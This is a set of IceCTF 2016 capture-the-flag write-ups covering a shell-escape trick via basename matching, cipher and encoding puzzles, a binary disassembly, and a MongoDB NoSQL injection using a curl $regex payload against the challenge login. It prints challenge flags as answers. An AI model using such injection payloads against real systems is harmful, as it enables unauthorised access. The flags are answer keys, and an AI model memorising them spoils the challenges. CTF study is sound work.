IceCTF 2016 More Challs by Birdy42

Demo

So I didn’t know what was the basename fct and didn’t want to spend a lot of time reading the doc.

I updated the original script to print what basename would return.

1
2
3
4
  mkdir /tmp/bi
  cd /tmp/bi
  cp /home/demo/demo.c /tmp/bi
  vi /tmp/bi/demo.c

I added printf of basename and it printed:

1
  demo

So I realized we just had to match the basename to icesh, I created a bash script:

1
2
3
4
  vi /tmp/bi/icesh
 
  #/bin/sh
  /home/demo/demo

Then ran it and got the shell

IceCTF 2016 Many Challs by Makhno

Spotlight (Web · 10 pt)

We got an acces to : http://spotlight.vuln.icec.tf/ Black page, but when you move mouse, hale light appears.

Analyzing with firebug

spotlight.js => console.log(“DEBUG: IceCTF{5tup1d_d3v5_w1th_th31r_l095}”); Le flag est :

IceCTF{5tup1d_d3v5_w1th_th31r_l095}

All your Base are belong to us (Misc · 15 pt)

Got a binary file, just translate it to ascii aaaaaand it’s done !

IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

IceCTF 2016 Substituted

We got a substitute flag, I hear they are pretty lax on the rules…

1
2
3
4
5
6
7
8
9
10
11
12
13
Lw!

Gyzvecy ke WvyVKT!

W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd.
Vorakeqojalr ljd j zemq lwdkeor, jzklesql gwkl kly juxymk et vecaskyod wk ljd qekkym oyjzzr vecazwvjkyu.
Decy dwcazy ezu vwalyod joy kly Vjydjo vwalyo, kly Xwqymyoy vwalyo, kly dsbdkwkskwem vwalyo, glwvl wd klwd emy, jmu de em.
Jzcedk jzz et klydy vwalyod joy yjdwzr boeiym keujr gwkl kly lyza et vecaskyod.
Decy myg ymvorakwem cykleud joy JYD, kly vsooymk dkjmujou teo ymvorakwem, jzemq gwkl ODJ.
Vorakeqojalr wd j xjdk twyzu jmu wd xyor wmkyoydkwmq klesql.
De iwvi bjvi, oyju sa em decy veez vwalyod jmu ljxy tsm!

El jmu teo reso oyveoud cr mjcy wd WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}.

I tried to find a know substutituion method but it failed, so I determined following thing :

1
WvyVKT = IceCTF 

From this, I gather that Gyzvecy was “Welcome”, then by hand i found flag IceCTF{always_listen_to_your_substitute_flags}

Done !

By eilco

IceCTF 2016 Dear Diary

First thing : objdump -d diary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
0804863d <flag>:
 804863d:       55                      push   %ebp
 804863e:       89 e5                   mov    %esp,%ebp
 8048640:       83 ec 28                sub    $0x28,%esp
 8048643:       65 a1 14 00 00 00       mov    %gs:0x14,%eax
 8048649:       89 45 f4                mov    %eax,-0xc(%ebp)
 804864c:       31 c0                   xor    %eax,%eax
 804864e:       c7 44 24 04 00 00 00    movl   $0x0,0x4(%esp)
 8048655:       00
 8048656:       c7 04 24 40 89 04 08    movl   $0x8048940,(%esp)
 804865d:       e8 9e fe ff ff          call   8048500 <open@plt>
 8048662:       89 45 f0                mov    %eax,-0x10(%ebp)
 8048665:       c7 44 24 08 00 01 00    movl   $0x100,0x8(%esp)
 804866c:       00
 804866d:       c7 44 24 04 a0 a0 04    movl   $0x804a0a0,0x4(%esp)
 8048674:       08
 8048675:       8b 45 f0                mov    -0x10(%ebp),%eax
 8048678:       89 04 24                mov    %eax,(%esp)
 804867b:       e8 00 fe ff ff          call   8048480 <read@plt>
 8048680:       8b 45 f4                mov    -0xc(%ebp),%eax
 8048683:       65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 804868a:       74 05                   je     8048691 <flag+0x54>
 804868c:       e8 2f fe ff ff          call   80484c0 <__stack_chk_fail@plt>
 8048691:       c9                      leave
 8048692:       c3                      ret

There is a routine called “flag” wich open and read flag.txt

Let’s run gdb

IceCTF 2016 ChainedIn

ChainedIn WU

First we can see website use mongoDB thanks to the logo

Analyzing with firebug we can see data are sent as json.

So I try to inject admin login, password should be the flag and begins with “IceCTF{”

1
ghozt@maze:~/ice/chained$ curl -H "Content-Type: application/json" -X POST -d '{"user":"admin","pass":{"$regex":"IceCTF{"}}' http://chainedin.vuln.icec.tf/login

It Works ! Let’s script !